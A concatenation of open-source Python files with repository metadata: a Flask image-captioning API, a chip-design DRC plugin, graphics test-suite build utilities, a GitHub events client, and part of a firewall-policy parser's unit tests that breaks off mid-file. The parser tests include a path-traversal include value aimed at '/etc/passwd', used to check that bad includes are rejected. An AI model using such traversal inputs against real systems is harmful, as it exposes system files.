tf.logging.set_verbosity(tf.logging.INFO)
class Initializer(Flask):
"""
Class to initialize the REST API, this class loads the model from the given checkpoint path in model_info.xml
and prepares a caption_generator object
"""
def __init__(self, name):
super(Initializer, self).__init__(name)
# build the inference graph
g = tf.Graph()
with g.as_default():
model = model_wrapper.ModelWrapper()
restore_fn = model.build_graph(FLAGS.checkpoint_path)
g.finalize()
# make the model globally available
self.model = model
# create the vocabulary
self.vocab = vocabulary.Vocabulary(FLAGS.vocab_file)
self.sess = tf.Session(graph=g)
# load the model from checkpoint
restore_fn(self.sess)
def current_time():
"""Returns current time in milli seconds"""
return int(1000 * time())
app = Initializer(__name__)
def get_remote_file(url, success=200, timeout=10):
"""
Given HTTP URL, this api gets the content of it
returns (Content-Type, image_content)
"""
try:
app.logger.info("GET: %s" % url)
auth = None
res = requests.get(url, stream=True, timeout=timeout, auth=auth)
if res.status_code == success:
return res.headers.get('Content-Type', 'application/octet-stream'), res.raw.data
except:
pass
return None, None
@app.route("/")
def index():
"""The index page which provide information about other API end points"""
return """
<div>
<h1> Image Captioning REST API </h1>
<h3> The following API end points are valid </h3>
<ul>
<h4> Inception V3 </h4>
<li> <code>/inception/v3/ping </code> - <br/>
<b> Description : </b> checks availability of the service. returns "pong" with status 200 when it is available
</li>
<li> <code>/inception/v3/caption/image</code> - <br/>
<table>
<tr><th align="left"> Description </th><td> This is a service that can caption images</td></tr>
<tr><th align="left"> How to supply Image Content </th></tr>
<tr><th align="left"> With HTTP GET : </th> <td>
Include a query parameter <code>url </code> which is an http url of JPEG image <br/>
Example: <code> curl "localhost:8764/inception/v3/caption/image?url=http://xyz.com/example.jpg"</code>
</td></tr>
<tr><th align="left"> With HTTP POST :</th><td>
POST JPEG image content as binary data in request body. <br/>
Example: <code> curl -X POST "localhost:8764/inception/v3/caption/image" --data-binary @example.jpg </code>
</td></tr>
</table>
</li>
<ul>
</div>
"""
@app.route("/inception/v3/ping", methods=["GET"])
def ping_pong():
"""API to do health check. If this says status code 200, then healthy"""
return "pong"
@app.route("/inception/v3/caption/image", methods=["GET", "POST"])
def caption_image():
"""API to caption images"""
image_format = "not jpeg"
st = current_time()
# get beam_size
beam_size = int(request.args.get("beam_size", "3"))
# get max_caption_length
max_caption_length = int(request.args.get("max_caption_length", "20"))
# get image_data
if request.method == 'POST':
image_data = request.get_data()
else:
url = request.args.get("url")
c_type, image_data = get_remote_file(url)
if not image_data:
return Response(status=400, response=jsonify(error="Could not HTTP GET %s" % url))
if 'image/jpeg' in c_type:
image_format = "jpeg"
# use c_type to find whether image_format is jpeg or not
# if jpeg, don't convert
if image_format == "jpeg":
jpg_image = image_data
# if not jpeg
else:
# open the image from raw bytes
image = Image.open(BytesIO(image_data))
# convert the image to RGB format, otherwise will give errors when converting to jpeg, if the image isn't RGB
rgb_image = image.convert("RGB")
# convert the RGB image to jpeg
image_bytes = BytesIO()
rgb_image.save(image_bytes, format="jpeg", quality=95)
jpg_image = image_bytes.getvalue()
image_bytes.close()
read_time = current_time() - st
# restart counter
st = current_time()
generator = caption_generator.CaptionGenerator(app.model,
app.vocab,
beam_size=beam_size,
max_caption_length=max_caption_length)
captions = generator.beam_search(app.sess, jpg_image)
captioning_time = current_time() - st
app.logger.info("Captioning time : %d" % captioning_time)
array_captions = []
for caption in captions:
sentence = [app.vocab.id_to_word(w) for w in caption.sentence[1:-1]]
sentence = " ".join(sentence)
array_captions.append({
'sentence': sentence,
'confidence': math.exp(caption.logprob)
})
response = {
'beam_size': beam_size,
'max_caption_length': max_caption_length,
'captions': array_captions,
'time': {
'read': read_time,
'captioning': captioning_time,
'units': 'ms'
}
}
return Response(response=json.dumps(response), status=200, mimetype="application/json")
def main(_):
if not app.debug:
print("Serving on port %d" % FLAGS.port)
app.run(host="0.0.0.0", port=FLAGS.port)
if __name__ == '__main__':
tf.app.run()
|
5cf6818f1942ab534fccdcc184ebed86e393ebd8
|
23d9ddbcb43715b44402961a7131b574624b23f8
|
/hammer/drc/magic/__init__.py
|
c14b5ca0935c07e6732220aedad3b96a00f3e366
|
[
"BSD-3-Clause"
] |
permissive
|
ucb-bar/hammer
|
d80b96c9d402d8a5c0b780c65de86597d93b4190
|
46b4e7525d8050904ad71786c57a2593976592a2
|
refs/heads/master
| 2023-06-25T15:51:37.728475
| 2023-06-15T16:15:33
| 2023-06-15T16:15:33
| 63,273,685
| 196
| 48
|
BSD-3-Clause
| 2023-09-08T05:09:48
| 2016-07-13T19:26:51
|
Python
|
UTF-8
|
Python
| false
| false
| 6,551
|
py
|
__init__.py
|
# Magic DRC plugin for Hammer
#
# See LICENSE for licence details.
import os
from textwrap import dedent as dd
from typing import List, Optional, Dict, Any
from hammer.logging import HammerVLSILogging
from hammer.utils import deepdict
from hammer.vlsi import HammerToolStep
from hammer.vlsi import HammerDRCTool, TCLTool
class Magic(HammerDRCTool, TCLTool):
#=========================================================================
# overrides from parent classes
#=========================================================================
@property
def steps(self) -> List[HammerToolStep]:
return self.make_steps_from_methods([
self.init_design,
self.run_drc
])
def do_post_steps(self) -> bool:
assert super().do_post_steps()
return self.run_magic()
@property
def env_vars(self) -> Dict[str, str]:
new_dict = deepdict(super().env_vars)
return new_dict
def fill_outputs(self) -> bool:
return True
def tool_config_prefix(self) -> str:
return "drc.magic"
def drc_results_pre_waived(self) -> Dict[str, int]:
return {}
def globally_waived_drc_rules(self) -> List[str]:
return []
def version_number(self, version:str) -> int:
"""Get version from magic bin"""
version = self.run_executable([self.get_setting("drc.magic.magic_bin"), "--version"])
return int(version.replace(".", ""))
@property
def generated_scripts_dir(self) -> str:
return os.path.join(self.run_dir, "generated-scripts")
@property
def view_drc_script(self) -> str:
return os.path.join(self.generated_scripts_dir, "view_drc")
@property
def view_drc_tcl(self) -> str:
return os.path.join(self.generated_scripts_dir, "view_drc.tcl")
#=========================================================================
# useful subroutines
#=========================================================================
def run_magic(self) -> bool:
self.append("quit")
run_script = os.path.join(self.run_dir, "drc.tcl")
with open(run_script, "w") as f:
f.write("\n".join(self.output))
args = [self.get_setting("drc.magic.magic_bin")]
rcfile = self.get_setting("drc.magic.rcfile")
techfile = self.get_drc_decks()
if rcfile is not None:
args.extend(["-rcfile", rcfile])
else:
# DRC deck should be the tech file. There should only be 1.
if len(techfile) == 0 or len(techfile) > 1:
self.logger.error("None or more than 1 tech file (DRC deck) found. netgen only supports 1.")
args.extend(["-T", techfile[0]])
"""
Create view_drc script. This opens interactive window but has to run DRC
all over again because there is no DRC database that can be loaded in.
"""
os.makedirs(self.generated_scripts_dir, exist_ok=True)
with open(self.view_drc_script, "w") as f:
f.write(dd("""
cd {run_dir}
{args} {gds} {run_script}
""".format(
run_dir = self.run_dir,
args = " ".join(args),
gds = self.layout_file,
run_script = self.view_drc_tcl
)).strip())
os.chmod(self.view_drc_script, 0o755)
with open(self.view_drc_tcl, "w") as f:
f.write(dd("""
gds read {gds}
load {top}
select top cell
drc check
""".format(gds = self.layout_file, top = self.top_module)).strip())
# Finally append the no GUI options and full Tcl run script
args.extend(["-noconsole", "-dnull", run_script])
if bool(self.get_setting("drc.magic.generate_only")):
self.logger.info("Generate-only mode: command-line is " + \
" ".join(args))
else:
# Temporarily disable colors/tag to make run output more readable
# TODO: think of a more elegant way to do this?
HammerVLSILogging.enable_colour = False
HammerVLSILogging.enable_tag = False
self.run_executable(args, cwd=self.run_dir) # TODO: check for errors
HammerVLSILogging.enable_colour = True
HammerVLSILogging.enable_tag = True
return True
#========================================================================
# drc main steps
#========================================================================
def init_design(self) -> bool:
"""Read design and set up results outputs"""
self.append("gds read " + self.layout_file)
self.append("load " + self.top_module)
self.append("select top cell")
self.append("set oscale [cif scale out]")
# Results output is taken from output of certain commands
# Hooks that also write to it should use the $fout variable
self.append("set fout [open drc.out w]")
self.append(self.get_additional_drc_text())
return True
def run_drc(self) -> bool:
"""Run DRC and dump error boxes"""
self.append('puts "Running DRC..."')
self.append("drc check")
self.append("set flat_count 0")
# Adapted from OpenLane
self.append('puts $fout "----------------------------------------"')
self.append("set drcresult [drc listall why]")
self.append('''
foreach {errtype coordlist} $drcresult {
puts $fout $errtype
puts $fout "----------------------------------------"
foreach coord $coordlist {
set bllx [expr {$oscale * [lindex $coord 0]}]
set blly [expr {$oscale * [lindex $coord 1]}]
set burx [expr {$oscale * [lindex $coord 2]}]
set bury [expr {$oscale * [lindex $coord 3]}]
set coords [format " %.3fum %.3fum %.3fum %.3fum" $bllx $blly $burx $bury]
puts $fout "$coords"
incr flat_count
}
puts $fout "----------------------------------------"
}
puts $fout ""
close $fout
''')
# Error counts
# TODO: hierarchical counts don't work in noconsole mode...
#self.append('puts "Hierarchical DRC error counts:"')
#self.append("puts [drc listall count]")
self.append('puts "Flat DRC error count: $flat_count"')
return True
tool = Magic
|
1f7428c212b6932cabaa6e7c501eec8cc57d0403
|
cc91a1c30f6c5a176b225bdbf96c7bfd6dfeca52
|
/scripts/ctsbuild/common.py
|
2ad5c74a35bcbffdd66b1cb6b3a93b1f7a595aa1
|
[
"Apache-2.0"
] |
permissive
|
KhronosGroup/VK-GL-CTS
|
d07b2611dc3a258b5be4ff87c1fe55623f32bac1
|
a745d5c29c5609cb7805f59444520a7700cf39d1
|
refs/heads/main
| 2023-08-31T19:34:48.447202
| 2023-08-25T13:17:54
| 2023-08-25T13:17:54
| 50,466,830
| 454
| 267
|
Apache-2.0
| 2023-09-02T20:49:14
| 2016-01-26T23:29:28
|
C++
|
UTF-8
|
Python
| false
| false
| 3,310
|
py
|
common.py
|
# -*- coding: utf-8 -*-
#-------------------------------------------------------------------------
# drawElements Quality Program utilities
# --------------------------------------
#
# Copyright 2015 The Android Open Source Project
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
#-------------------------------------------------------------------------
import os
import sys
import shlex
import platform
import subprocess
DEQP_DIR = os.path.realpath(os.path.normpath(os.path.join(os.path.dirname(__file__), "..", "..")))
# HostInfo describes properties of the host where these scripts
# are running on.
class HostInfo:
OS_WINDOWS = 0
OS_LINUX = 1
OS_OSX = 2
@staticmethod
def getOs ():
if sys.platform == 'darwin':
return HostInfo.OS_OSX
elif sys.platform == 'win32':
return HostInfo.OS_WINDOWS
elif sys.platform.startswith('linux'):
return HostInfo.OS_LINUX
else:
raise Exception("Unknown sys.platform '%s'" % sys.platform)
@staticmethod
def getArchBits ():
MACHINE_BITS = {
"i386": 32,
"i686": 32,
"x86": 32,
"x86_64": 64,
"AMD64": 64
}
machine = platform.machine()
if not machine in MACHINE_BITS:
raise Exception("Unknown platform.machine() '%s'" % machine)
return MACHINE_BITS[machine]
def die (msg):
print(msg)
exit(-1)
def shellquote(s):
return '"%s"' % s.replace('\\', '\\\\').replace('"', '\"').replace('$', '\$').replace('`', '\`')
g_workDirStack = []
def pushWorkingDir (path):
oldDir = os.getcwd()
os.chdir(path)
g_workDirStack.append(oldDir)
def popWorkingDir ():
assert len(g_workDirStack) > 0
newDir = g_workDirStack[-1]
g_workDirStack.pop()
os.chdir(newDir)
def execute (args):
retcode = subprocess.call(args)
if retcode != 0:
raise Exception("Failed to execute '%s', got %d" % (str(args), retcode))
def readBinaryFile (filename):
f = open(filename, 'rb')
data = f.read()
f.close()
return data
def readFile (filename):
f = open(filename, 'rt')
data = f.read()
f.close()
return data
def writeBinaryFile (filename, data):
f = open(filename, 'wb')
f.write(data)
f.close()
def writeFile (filename, data):
if (sys.version_info < (3, 0)):
f = open(filename, 'wt')
else:
f = open(filename, 'wt', newline='\n')
f.write(data)
f.close()
def which (binName, paths = None):
if paths == None:
paths = os.environ['PATH'].split(os.pathsep)
def whichImpl (binWithExt):
for path in paths:
path = path.strip('"')
fullPath = os.path.join(path, binWithExt)
if os.path.isfile(fullPath) and os.access(fullPath, os.X_OK):
return fullPath
return None
extensions = [""]
if HostInfo.getOs() == HostInfo.OS_WINDOWS:
extensions += [".exe", ".bat"]
for extension in extensions:
extResult = whichImpl(binName + extension)
if extResult != None:
return extResult
return None
|
1d20bad6ea3cdfbcaa6d7ef908b9d1e10e711320
|
1fbe9c5ff4f12a98e8dc0f213ab75c6c15526797
|
/baymax/libs/github.py
|
86cd864f19fd22f8a5bbe7ec53eedd2eac259a13
|
[] |
no_license
|
no13bus/baymax
|
347db6e3ace2e8ac862f3660f736e7eb94fb0568
|
5fa88b5da21542bfacb3013bc1de1c6b9a9edab2
|
refs/heads/master
| 2023-09-04T14:47:49.506596
| 2022-06-13T08:32:15
| 2022-06-13T08:32:15
| 27,410,003
| 401
| 68
| null | 2015-05-22T02:51:30
| 2014-12-02T01:55:00
|
Python
|
UTF-8
|
Python
| false
| false
| 1,839
|
py
|
github.py
|
# coding: utf-8
import requests
import json
import datetime
from itertools import groupby
API_URL = 'https://api.github.com'
class GitHub(object):
def __init__(self, token, username):
self.token = token
self.username = username
def get_datas(self):
url = '%s/users/%s/events?page=1&per_page=100&access_token=%s' % (API_URL, self.username, self.token)
r = requests.get(url)
j = json.loads(r.content)
def group_key(s):
time_str = datetime.datetime.strptime(s['created_at'], '%Y-%m-%dT%H:%M:%SZ').strftime('%Y-%m-%d')
return time_str
now = datetime.datetime.now().strftime('%Y-%m-%d')
j = [i for i in j if i['type'] == 'PushEvent' and datetime.datetime.strptime(i['created_at'], '%Y-%m-%dT%H:%M:%SZ').strftime('%Y-%m-%d') < now]
res = []
for key,valuesiter in groupby(j, key=group_key):
res.append((key, len(list(valuesiter))))
return res
# start_day: 2015-05-01 数据库内最新的时间
def get_data(self, start_day):
now_time_str = datetime.datetime.now().strftime('%Y-%m-%d')
url = '%s/users/%s/events?page=1&per_page=100&access_token=%s' % (API_URL, self.username, self.token)
r = requests.get(url)
j = json.loads(r.content)
def group_key(s):
time_str = datetime.datetime.strptime(s['created_at'], '%Y-%m-%dT%H:%M:%SZ').strftime('%Y-%m-%d')
return time_str
j = [i for i in j if i['type'] == 'PushEvent' and i['created_at'].split('T')[0] < now_time_str]
res = []
for key,valuesiter in groupby(j, key=group_key):
if start_day < key:
res.append((key, len(list(valuesiter))))
else:
break
return res
|
7f8ff177a2acf6b2edb46d514a57516ca09d7a77
|
fcab2679a5c5030c54bbee10857a64263e8d7b46
|
/tests/lib/policy_test.py
|
d550d5d496487fe407eb14ab2db7a8de69200285
|
[
"Apache-2.0"
] |
permissive
|
google/capirca
|
38eb9339e565b30667d264e18e9b81ee0ac41d18
|
d145ca447e0e04895507777b8c5834c22e90df11
|
refs/heads/master
| 2023-08-28T02:37:19.814474
| 2023-08-23T13:59:33
| 2023-08-23T13:59:33
| 40,198,544
| 743
| 238
|
Apache-2.0
| 2023-09-11T20:02:40
| 2015-08-04T17:25:11
|
Python
|
UTF-8
|
Python
| false
| false
| 56,858
|
py
|
policy_test.py
|
# Copyright 2011 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Unit tests for policy.py library."""
from absl.testing import absltest
from unittest import mock
from absl import logging
from capirca.lib import nacaddr
from capirca.lib import naming
from capirca.lib import policy
HEADER = """
header {
comment:: "this is a test acl"
comment:: "this is another comment"
target:: juniper test-filter
}
"""
HEADER_2 = """
header {
comment:: "this goes in the other direction"
target:: juniper test-filter-outbound
}
"""
HEADER_3 = """
header {
comment:: "test header 3"
target:: cisco 50 standard
}
"""
HEADER_4 = """
header {
comment:: "test header 4"
target:: iptables
}
"""
HEADER_5 = """
header {
comment:: "test header 5"
target:: gce global/networks/default
}
"""
HEADER_6 = """
header {
comment:: "this is a test nftable acl"
target:: nftables chain_name input 0 inet
}
"""
HEADER_V6 = """
header {
comment:: "this is a test inet6 acl"
comment:: "this is another comment"
target:: juniper test-filter inet6
}
"""
HEADER_SRX = """
header {
target:: srx from-zone foo to-zone bar
}
"""
HEADER_OBJ_GRP = """
header {
target:: cisco foo object-group
}
"""
HEADER_ADDRBOOK_MIXED = """
header {
target:: srx from-zone to-zone bar
target:: cisco foo
}
"""
HEADER_HF_1 = """
header {
comment:: "This is a test of HF INGRESS Policy."
target:: gcp_hf INGRESS
}
"""
INCLUDE_STATEMENT = """
#include "includes/y.inc"
"""
INCLUDED_Y_FILE = """
term included-term-1 {
protocol:: tcp
action:: accept
}
#include "includes/z.inc"
"""
BAD_INCLUDED_FILE = """
term included-term-1 {
protocol:: tcp
action:: accept
}
#include "/tmp/z.inc"
"""
BAD_INCLUDED_FILE_1 = """
term included-term-1 {
protocol:: tcp
action:: accept
}
#include "includes/../../etc/passwd.inc"
"""
GOOD_INCLUDED_FILE_1 = """
term good-included-term-1 {
protocol:: tcp
action:: accept
}
#include "includes/../pol/z.inc"
"""
GOOD_TERM_0 = """
term good-term-0 {
protocol:: icmp
action:: accept
}
"""
GOOD_TERM_1 = """
term good-term-1 {
protocol:: icmp
action:: accept
}
"""
GOOD_TERM_2 = """
term good-term-2 {
protocol:: tcp
source-address:: PROD_NETWRK
action:: accept
}
"""
GOOD_TERM_3 = """
term good-term-3 {
protocol:: tcp
source-address:: PROD_NETWRK
destination-port:: SMTP
action:: accept
}
"""
GOOD_TERM_4 = """
term good-term-4 {
protocol:: 1
action:: accept
}
"""
GOOD_TERM_5 = """
term good-term-5 {
action:: accept
}
"""
GOOD_TERM_6 = """
term good-term-6 {
protocol:: tcp
destination-port:: MYSQL HIGH_PORTS
action:: accept
}
"""
GOOD_TERM_7 = """
term good-term-7 {
protocol:: tcp
destination-address:: PROD_NETWRK
destination-exclude:: PROD_EH
action:: accept
}
"""
GOOD_TERM_8 = """
term good-term-8 {
protocol:: tcp udp
destination-port:: DNS
action:: accept
}
"""
GOOD_TERM_9 = """
term good-term-9 {
comment:: "first comment"
comment:: "second comment"
action:: accept
}
"""
GOOD_TERM_10 = """
term good-term-10 {
logging:: true
action:: accept
}
"""
GOOD_TERM_11 = """
term good-term-11 {
protocol:: icmp
icmp-type:: echo-reply echo-request unreachable
action:: accept
}
"""
GOOD_TERM_12 = """
term qos-good-term-12 {
action:: accept
qos:: af4
}
"""
GOOD_TERM_13 = """
term good-term-13 {
source-port:: GOOGLE_PUBLIC
source-port:: SNMP
protocol:: udp
action:: accept
}
"""
GOOD_TERM_14 = """
term good-term-14 {
source-prefix:: foo_prefix_list
action:: accept
}
"""
GOOD_TERM_15 = """
term good-term-15 {
destination-prefix:: bar_prefix_list baz_prefix_list
action:: accept
}
"""
GOOD_TERM_16 = """
term good-term-16 {
ether-type:: arp ipv4
ether-type:: vlan
action:: accept
}
"""
GOOD_TERM_17 = """
term good-term-17 {
traffic-type:: broadcast unknown-unicast
traffic-type:: multicast
action:: accept
}
"""
GOOD_TERM_18 = """
term good-term-18 {
comment:: "test verbatim output"
verbatim:: iptables "mary had a little lamb"
verbatim:: juniper "mary had another lamb"
}
"""
GOOD_TERM_19 = """
term good-term-19 {
source-port:: HTTP MYSQL
destination-address:: PROD_EXTERNAL_SUPER PROD_NETWRK
protocol:: tcp
action:: accept
}
"""
GOOD_TERM_20 = """
term good-term-20 {
source-port:: MYSQL HTTP
destination-address:: PROD_NETWRK PROD_EXTERNAL_SUPER
protocol:: tcp
action:: accept
}
"""
GOOD_TERM_21 = """
term good-term-21 {
source-port:: MYSQL HTTPS
destination-address:: PROD_NETWRK PROD_EXTERNAL_SUPER
protocol:: tcp
action:: accept
}
"""
GOOD_TERM_22 = """
term precedence-term {
protocol:: icmp
precedence:: 1
action:: accept
}
"""
GOOD_TERM_23 = """
term loss-priority-term {
source-port:: SSH
protocol:: tcp
loss-priority:: low
action:: accept
}
"""
GOOD_TERM_24 = """
term routing-instance-term {
source-port:: SSH
protocol:: tcp
routing-instance:: foobar-router
}
"""
GOOD_TERM_25 = """
term source-interface-term {
source-port:: SSH
protocol:: tcp
source-interface:: foo0
action:: accept
}
"""
GOOD_TERM_26 = """
term good-term-26 {
protocol:: tcp
source-address:: PROD_NETWRK
source-exclude:: PROD_EH
action:: accept
}
"""
GOOD_TERM_27 = """
term good-term-27 {
protocol:: tcp
address:: PROD_NETWRK
address-exclude:: PROD_EH
action:: accept
}
"""
GOOD_TERM_28 = """
term good-term-28 {
protocol:: tcp
source-address:: PROD_NETWRK
source-exclude:: BOTTOM_HALF
action:: accept
}
"""
GOOD_TERM_29 = """
term good-term-29 {
protocol:: tcp
option:: tcp-established
source-address:: PROD_NETWRK
action:: accept
}
"""
GOOD_TERM_30 = """
term good-term-30 {
protocol:: tcp
action:: accept
vpn:: special-30
}
"""
GOOD_TERM_31 = """
term good-term-31 {
protocol:: tcp
action:: accept
vpn:: special-31 policy-11
}
"""
GOOD_TERM_32 = """
term good-term-32 {
forwarding-class:: fritzy
action:: accept
}
"""
GOOD_TERM_33 = """
term good-term-33 {
forwarding-class:: flashy
action:: accept
}
"""
GOOD_TERM_34 = """
term good-term-34 {
source-tag:: src-tag
destination-tag:: dest-tag
action:: accept
}
"""
GOOD_TERM_35 = """
term good-term-35 {
source-address:: PROD_NETWRK
next-ip:: NEXT_IP
}
"""
GOOD_TERM_36 = """
term good-term-36 {
forwarding-class:: flashy fritzy
action:: accept
}
"""
GOOD_TERM_37 = """
term good-term-37 {
protocol:: icmp
action:: accept
log_name:: "my special prefix"
}
"""
GOOD_TERM_38 = """
term good-term-38 {
source-prefix-except:: foo_prefix_list
action:: accept
}
"""
GOOD_TERM_39 = """
term good-term-39 {
destination-prefix-except:: bar_prefix_list baz_prefix_list
action:: accept
}
"""
GOOD_TERM_40 = """
term good-term-38 {
source-prefix:: foo_prefix_list
source-prefix-except:: foo_prefix_list_except
action:: accept
}
"""
GOOD_TERM_41 = """
term good-term-39 {
destination-prefix:: bar_prefix_list
destination-prefix-except:: bar_prefix_list_except
action:: accept
}
"""
GOOD_TERM_42 = """
term good-term-42 {
protocol:: icmp
icmp-type:: unreachable
icmp-code:: 3 4
action:: accept
}
"""
GOOD_TERM_43 = """
term good-term-43 {
ttl:: 10
action:: accept
}
"""
GOOD_TERM_44 = """
term good-term-44 {
logging:: syslog
log-limit:: 999/day
action:: accept
}
"""
GOOD_TERM_45 = """
term good-term-45 {
source-address:: ANY
action:: accept
target-service-accounts:: acct1@blah.com
}
"""
GOOD_TERM_46 = """
term good-term-46 {
protocol:: icmp tcp udp gre esp ah sctp
encapsulate:: stuff_and_things
}
"""
GOOD_TERM_47 = """
term good-term-47 {
protocol:: icmp tcp udp gre esp ah sctp
port-mirror:: true
}
"""
GOOD_TERM_48 = """
term good-term-48 {
protocol:: icmp
source-zone:: zone1 zone2
destination-zone:: zone1 zone2
action:: accept
}
"""
GOOD_TERM_49 = """
term good-term-46 {
protocol:: udp
decapsulate:: mpls-in-udp
}
"""
GOOD_TERM_50 = """
term good-term-45 {
source-address:: ANY
action:: accept
source-service-accounts:: acct1@blah.com
}
"""
GOOD_TERM_V6_1 = """
term good-term-v6-1 {
hop-limit:: 5
action:: accept
}
"""
GOOD_TERM_V6_2 = """
term good-term-v6-1 {
hop-limit:: 5-7
action:: accept
}
"""
TERM_SUPER_2 = """
term term-super {
address:: PROD
action:: accept
}
"""
TERM_SUPER_3 = """
term term-super {
protocol-except:: tcp udp icmpv6
counter:: stuff_and_things
action:: reject
}
"""
TERM_SUB_2 = """
term term-sub {
protocol:: icmp
action:: accept
}
"""
TERM_UNSORTED_ICMP_TYPE = """
term good-term-11 {
protocol:: icmp
icmp-type:: unreachable echo-request echo-reply
action:: accept
}
"""
TERM_UNSORTED_ICMP_CODE = """
term good-term-11 {
icmp-type:: unreachable
icmp-code:: 15 4 9 1
action:: accept
}
"""
BAD_TERM_1 = """
term bad-term- 1 {
protocol:: tcp
action:: reject
}
"""
BAD_TERM_2 = """
term bad-term-2 {
prootocol:: tcp
action:: accept
}
"""
BAD_TERM_3 = """
term bad-term-3 {
protocol:: tcp
source-port:: SNMP
action:: accept
}
"""
BAD_TERM_4 = """
term bad-term-4 {
source-port:: SMTP
action:: accept
}
"""
BAD_TERM_5 = """
term bad-term-5 {
protocol:: tcp
destination-address:: PROD_EH
destination-exclude:: PROD_NETWRK
action:: accept
}
"""
BAD_TERM_6 = """
term bad-term-6 {
logging:: unvalidloggingoption
action:: accept
}
"""
BAD_TERM_7 = """
term bad-term-7 {
action:: discard
}
"""
BAD_TERM_8 = """
term bad-term-8 {
akshun:: accept
}
"""
BAD_TERM_9 = """
term bad-term-9 {
ether-type:: arp
protocol:: udp
action:: accept
}
"""
BAD_TERM_10 = """
term bad-term-10 {
verbatim:: cisco "mary had a little lamb"
action:: accept
}
"""
BAD_TERM_12 = """
term bad-term-12 {
protocol:: icmp
icmp-type:: echo-foo packet-too-beaucoups
action:: accept
}
"""
BAD_TERM_13 = """
term bad-term-13 {
protocol:: icmp
icmp-type:: unreachable
icmp-code:: 99
action:: accept
}
"""
BAD_TERM_14 = """
term bad-term-14 {
protocol:: icmp
icmp-type:: unreachable redirect
icmp-code:: 3
action:: accept
}
"""
BAD_TERM_15 = """
term bad-term-15 {
ttl:: 300
action:: accept
}
"""
BAD_TERM_16 = """
term bad-term-16 {
destination-port:: FOO
protocol:: tcp udp gre
action:: accept
}
"""
# pylint: disable=maybe-no-member
class PolicyTest(absltest.TestCase):
def setUp(self):
super().setUp()
self.naming = mock.create_autospec(naming.Naming)
@mock.patch.object(policy, '_ReadFile')
def testIncludes(self, mock_file):
"""Ensure includes work, as well as nested included."""
mock_file.side_effect = [INCLUDED_Y_FILE, GOOD_TERM_5]
# contents of our base policy (which has an included file)
pol = HEADER + INCLUDE_STATEMENT + GOOD_TERM_1
p = policy.ParsePolicy(pol, self.naming)
_, terms = p.filters[0]
# ensure include worked and we now have 3 terms in this policy
self.assertEqual(len(terms), 3)
# ensure included_term_1 is included as first term
self.assertEqual(terms[0].name, 'included-term-1')
# ensure good-term-5 is included as second term
self.assertEqual(terms[1].name, 'good-term-5')
# ensure good-term-1 shows up as the second term
self.assertEqual(terms[2].name, 'good-term-1')
mock_file.assert_has_calls(
[mock.call('includes/y.inc'), mock.call('includes/z.inc')]
)
@mock.patch.object(policy, '_ReadFile')
def testBadIncludes(self, mock_file):
"""Ensure nested includes error handling works."""
mock_file.side_effect = [BAD_INCLUDED_FILE, GOOD_TERM_5]
# contents of our base policy (which has a bad included file)
pol = HEADER + INCLUDE_STATEMENT + GOOD_TERM_1
self.assertRaises(
policy.InvalidIncludeDirectoryError,
policy.ParsePolicy,
pol,
self.naming,
)
# Ensuring relative paths don't bypass invalid directory checks
mock_file.side_effect = [BAD_INCLUDED_FILE_1, GOOD_TERM_5]
pol = HEADER + BAD_INCLUDED_FILE_1 + GOOD_TERM_1
self.assertRaises(
policy.InvalidIncludeDirectoryError,
policy.ParsePolicy,
pol,
self.naming,
)
@mock.patch.object(policy, '_ReadFile')
def testGoodIncludesWithRelativePaths(self, mock_file):
"""Ensure nested includes error handling works for valid files."""
mock_file.side_effect = [GOOD_TERM_5]
# base policy has a good included file, with relative paths
pol = HEADER + GOOD_INCLUDED_FILE_1 + GOOD_TERM_1
p = policy.ParsePolicy(pol, self.naming)
_, terms = p.filters[0]
# ensure include worked and we now have 3 terms in this policy
self.assertEqual(len(terms), 3)
self.assertEqual(terms[0].name, 'good-included-term-1')
self.assertEqual(terms[1].name, 'good-term-5')
self.assertEqual(terms[2].name, 'good-term-1')
def testGoodPol(self):
pol = HEADER + GOOD_TERM_1 + GOOD_TERM_2
self.naming.GetNetAddr.return_value = [nacaddr.IPv4('10.0.0.0/8')]
ret = policy.ParsePolicy(pol, self.naming)
# we should only have one filter from that
self.assertEqual(len(ret.filters), 1)
header, terms = ret.filters[0]
self.assertEqual(type(ret), policy.Policy)
self.assertEqual(str(terms[0].protocol[0]), 'icmp')
self.assertEqual(len(terms), 2)
# the comment is stored as a double quoted string, complete with double
# quotes.
self.assertEqual(str(header.comment[0]), 'this is a test acl')
self.assertEqual(str(header.comment[1]), 'this is another comment')
self.assertEqual(str(header.target[0]), 'juniper')
self.naming.GetNetAddr.assert_called_once_with('PROD_NETWRK')
def testBadPol(self):
pol = HEADER + BAD_TERM_1
self.assertRaises(policy.ParseError, policy.ParsePolicy, pol, self.naming)
def testMissingHeader(self):
pol = GOOD_TERM_1 + GOOD_TERM_2
self.assertRaises(policy.ParseError, policy.ParsePolicy, pol, self.naming)
def testService(self):
pol = HEADER + GOOD_TERM_1 + GOOD_TERM_3
self.naming.GetNetAddr.return_value = [nacaddr.IPv4('10.0.0.0/8')]
self.naming.GetServiceByProto.return_value = ['25']
ret = policy.ParsePolicy(pol, self.naming)
self.assertEqual(len(ret.filters), 1)
_, terms = ret.filters[0]
self.assertEqual(len(terms), 2)
self.assertEqual(str(terms[1].protocol[0]), 'tcp')
self.assertEqual(terms[1].destination_port[0], (25, 25))
self.naming.GetNetAddr.assert_called_once_with('PROD_NETWRK')
self.naming.GetServiceByProto.assert_called_once_with('SMTP', 'tcp')
def testInvalidKeyword(self):
pol = HEADER + BAD_TERM_2
self.assertRaises(policy.ParseError, policy.ParsePolicy, pol, self.naming)
def testNumericProtocol(self):
pol = HEADER + GOOD_TERM_4
ret = policy.ParsePolicy(pol, self.naming)
self.assertEqual(len(ret.filters), 1)
_, terms = ret.filters[0]
self.assertEqual(str(terms[0].protocol[0]), '1')
def testHopLimitSingle(self):
